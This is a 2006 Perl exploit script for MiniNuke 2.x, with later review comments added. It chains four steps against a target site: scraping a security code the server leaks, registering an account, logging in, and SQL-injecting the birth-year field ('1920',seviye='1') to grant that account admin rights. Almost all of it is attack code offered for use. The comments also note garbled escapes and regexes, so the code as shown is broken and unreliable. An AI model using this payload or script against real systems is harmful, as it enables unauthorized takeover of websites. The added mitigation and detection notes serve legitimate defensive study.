# Title : MiniNuke 2.x (create an admin) Remote SQL Injection Exploit
# Published : 2006-05-27
# Author : nukedx
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
# Entry point: exactly five positional arguments are expected (see usage()).
# There is no `use strict`/`use warnings`; every variable in this script is a
# package global, which is how later subs read what exploit() assigned.
if(@ARGV != 5) { usage(); }
else { exploit(); }
# Print the advisory banner.
# NOTE(review): the line terminators throughout this listing read as literal
# `rn`/`n`; the backslashes of `\r\n` appear to have been stripped when the
# file was archived, so neither the console output nor the HTTP requests
# below are byte-exact as shown.
sub header()
{
print "n- NukedX Security Advisory Nr.2006-31rn";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploitrn";
}
# Print the banner and argument help, then exit. Called when the argument
# count is wrong; never returns.
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>rn";
print "- <host> -> Victim's host ex: www.victim.comrn";
print "- <path> -> Path to MiniNuke ex: /mininuke/rn";
print "- <user> -> Desired username to create ex: h4x0rrn";
print "- <pass> -> Password for our username ex: p4ZZw0rdrn";
print "- <mail> -> Mail for our username ex: hax0r@s3x0r3d.comrn";
exit();
}
# Copy the five command-line arguments into package globals and start the
# request chain: getsession() -> doregister() -> dologin() -> doadmin().
# Each step calls the next from inside its response-reading loop and ends
# with exit() or die(), so control never comes back here.
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
# Intended to strip a leading "http://" from <host>. As archived the pattern's
# slashes are unescaped, so this line does not parse as a valid substitution.
$mnserver =~ s/(http://)//eg;
$mnhost = "http://".$mnserver;    # base of the absolute request-URI and the Referer header
$mndir = $ARGV[1];
# <user>, <pass> and <mail> are interpolated into form bodies below without
# URL-encoding, so values containing '&', '=' or '%' would corrupt the request.
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";    # fixed port, plain HTTP only
#Sending data...
header();
print "- Trying to connect: $mnserverrn";
getsession();
}
# Step 1: GET the registration form and harvest two things from the response:
# every Set-Cookie value (accumulated into $mncookie) and the "security code"
# ("Güvenlik Kodunuz", rendered as mojibake in the pattern below) that the
# page prints in its own HTML. Because the server echoes the expected code
# to the client, the anti-automation check adds no protection; a client can
# read it and replay it in the registration POST. Mitigation on the server
# side: keep the expected value in the session, never in the response body.
# Detection: the fixed User-Agent "NukeZilla" is a usable log signature.
# NOTE(review): both regexes below contain an unescaped '/', which would end
# the pattern early; the backslashes were presumably lost in archiving.
sub getsession ()
{
print "- Getting session for register...rn";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
# The request-line uses the absolute URI ($mnhost...), not just the path.
print $mns "GET $mnsreq HTTP/1.1n";
print $mns "Accept: */*n";
print $mns "Referer: $mnhostn";
print $mns "Accept-Language: trn";
print $mns "User-Agent: NukeZillan";
print $mns "Cache-Control: no-cachen";
print $mns "Host: $mnservern";
print $mns "Connection: closenn";
print "- Connected...rn";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=//) { $mncookie = $mncookie.$1; }
# doregister() does not return (it exits or dies), so the loop ends here on a hit.
if ($answer =~ /G¨¹venlik Kodunuz</td><td width="50%"><b>(.*?)</b></td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failedrn";
}
# Step 2: POST the registration form using the cookie and security code
# collected by getsession(). All fields other than <user>/<pass>/<mail> are
# filler values. Success is recognised by the Turkish "Tebrikler !!!"
# ("Congratulations") string in the response; on a hit dologin() is called
# and never returns.
sub doregister ()
{
close($mns);    # the GET connection from getsession() is no longer needed
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting donern";
print "- Lets create our user...rn";
# Form body is built by plain concatenation; nothing here is URL-encoded.
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;    # the code the server itself disclosed in step 1
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mn "POST $mnreq HTTP/1.1rn";
print $mn "Accept: */*rn";
print $mn "Referer: $mnhostrn";
print $mn "Accept-Language: trrn";
print $mn "Content-Type: application/x-www-form-urlencodedrn";
print $mn "Accept-Encoding: gzip, deflatern";
print $mn "User-Agent: NukeZillarn";
print $mn "Cookie: $mncookiern";
print $mn "Host: $mnserverrn";
print $mn "Content-length: $mndatalenrn";
print $mn "Connection: Keep-Alivern";
print $mn "Cache-Control: no-cachernrn";
print $mn $mndata;
# Trailing bytes beyond Content-length; on a keep-alive connection a server
# would see them as the start of a next request.
print $mn "rnrn";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...rn";
print "- Loginning in to user...rn";
dologin();
}
}
#if you are here...
die "- Exploit failedrn";
}
# Step 3: POST the new credentials to enter.asp and collect the resulting
# session cookie(s) into $mnlcookie. The guvenlik/gguvenlik fields are sent
# with a fixed value, which suggests the login form's security-code check is
# not enforced server-side (assumption — not verifiable from this script).
# "Success" is detected merely by a Cache-control: response header, which
# says nothing about whether the login was accepted; doadmin() is then
# called and never returns.
sub dologin ()
{
close ($mn);    # registration connection from doregister()
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mnl "POST $mnlreq HTTP/1.1rn";
print $mnl "Accept: */*rn";
print $mnl "Referer: $mnhostrn";
print $mnl "Accept-Language: trrn";
print $mnl "Content-Type: application/x-www-form-urlencodedrn";
print $mnl "Accept-Encoding: gzip, deflatern";
print $mnl "User-Agent: NukeZillarn";
print $mnl "Host: $mnserverrn";
print $mnl "Content-length: $mnldatalenrn";
print $mnl "Connection: Keep-Alivern";
print $mnl "Cache-Control: no-cachernrn";
print $mnl $mnldata;
print $mnl "rnrn";
while ($answer = <$mnl>) {
# NOTE(review): as in getsession(), the unescaped '/' before the closing
# delimiter would end the pattern early; backslashes presumably lost in archiving.
if ($answer =~ /Set-Cookie: (.*?) path=//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failedrn";
}
# Step 4: the injection itself. The profile-update handler
# (Your_Account.asp?op=UpdateProfile) evidently concatenates the yas_3
# (birth-year) field into its SQL UPDATE. The value "1920',seviye='1" closes
# the yas_3 literal with a single quote and appends a second column
# assignment, seviye='1' — seviye ("level") is presumably the privilege
# column, since the advisory title says the outcome is an admin account.
# Mitigation: parameterised queries, and server-side type checks so a numeric
# field such as yas_3 never reaches the database as a string; a profile
# update should only ever touch the columns the form exposes.
# Detection: single quotes and commas inside numeric profile fields in POST
# bodies to UpdateProfile, plus the "NukeZilla" User-Agent.
sub doadmin ()
{
close($mnl);    # login connection from dologin()
print "- Editing profile..rn";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
# First statement appends to an as-yet-unassigned global (no strict/warnings).
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";    # the SQL injection payload (see header comment)
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...rn";
print $mnp "POST $mnpreq HTTP/1.1rn";
print $mnp "Accept: */*rn";
print $mnp "Referer: $mnhostrn";
print $mnp "Accept-Language: trrn";
print $mnp "Content-Type: application/x-www-form-urlencodedrn";
print $mnp "Accept-Encoding: gzip, deflatern";
print $mnp "User-Agent: NukeZillarn";
print $mnp "Cookie: $mnlcookiern";    # session cookie(s) captured by dologin()
print $mnp "Host: $mnserverrn";
print $mnp "Content-length: $mnpdatalenrn";
print $mnp "Connection: Keep-Alivern";
print $mnp "Cache-Control: no-cachernrn";
print $mnp $mnpdata;
# Writes to $mn, which dologin() already closed, rather than to $mnp;
# looks like a copy-paste slip from doregister().
print $mn "rnrn";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...rn";
print "- Exploiting finished succesfullyrn";
print "- Your username $mnuser has been created as adminrn";
print "- You can login with password $mnpass on $mnlreqrn";
exit();
}
# Mojibake'd Turkish message from the application, treated as failure.
if ($answer =~ /¨¹yeler A?yktyr/) {
print "- Exploit failedrn";
exit();
}
}
#if you are here...
die "- Exploit failedrn";
}
# nukedx.com [2006-05-27]
# www.Syue.com [2006-05-27]